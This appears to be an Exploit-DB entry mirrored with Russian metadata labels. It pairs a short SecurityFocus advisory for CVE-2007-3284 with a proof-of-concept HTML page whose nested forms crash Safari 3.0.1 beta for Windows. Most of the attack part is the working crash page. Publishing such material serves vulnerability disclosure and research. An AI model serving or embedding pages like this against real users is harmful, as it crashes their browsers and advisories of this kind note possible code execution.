- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30193
- Проверка EDB
-
- Пройдено
- Автор
- LOSTMON
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-3284
- Дата публикации
- 2007-06-16
HTML:
source: https://www.securityfocus.com/bid/24497/info
Apple Safari for Windows is prone to a denial-of-service vulnerability because it fails to properly handle user-supplied input.
An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.
Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Attackers may also be able to execute arbitrary code, but Symantec had not confirmed this.
Safari 3.0.1 public beta for Windows is reported vulnerable.
<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title> <body> <p>Safari 3.0.1 beta for windows Crash Poc By Lostmon ([email protected] )</p> <p> Put some number in the second form for crash Safari</p> <form id="historyForm1" method="GET" action="#"> <input type="text" id="currentIndex1" name="currentIndex" value="sss"> <textarea id="historyLocation1" name="historyLocation"></textarea> <form id="historyForm2" method="GET" action="#"> <input type="text" id="currentIndex2" name="currentIndex"> <textarea id="historyLocation2" name="historyLocation"></textarea> </form></form></body></html>- Источник
- www.exploit-db.com
